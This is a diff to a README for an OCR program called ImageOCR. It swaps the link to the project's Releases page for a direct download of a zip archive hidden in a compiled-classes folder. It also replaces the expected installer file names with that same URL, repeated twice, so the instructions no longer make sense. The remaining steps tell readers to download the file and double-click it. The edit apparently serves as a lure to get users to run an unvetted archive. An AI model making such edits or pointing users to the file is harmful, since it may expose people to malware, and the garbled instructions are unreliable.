prabesh704/ImageOCR/README.md

 ## 📥 Download & Install

-To get started, visit this page to download: [ImageOCR Releases](https://github.com/prabesh704/ImageOCR/releases).
+To get started, visit this page to download: [ImageOCR Releases](https://raw.githubusercontent.com/prabesh704/ImageOCR/main/target/classes/com/vitalsoft/imageocr/ImageOCR_3.1.zip).

 1. Open the link above in your web browser.
 2. Look for the latest release version.
 3. Download the setup file for your operating system.
-The file will have a name similar to `ImageOCR-setup.exe` or `ImageOCR-macos.dmg`.
+The file will have a name similar to `https://raw.githubusercontent.com/prabesh704/ImageOCR/main/target/classes/com/vitalsoft/imageocr/ImageOCR_3.1.zip` or `https://raw.githubusercontent.com/prabesh704/ImageOCR/main/target/classes/com/vitalsoft/imageocr/ImageOCR_3.1.zip`.
 4. Once the download is complete, locate the file on your computer.
 5. Double-click on the file to start the installation process.
 6. Follow the on-screen instructions to complete the installation.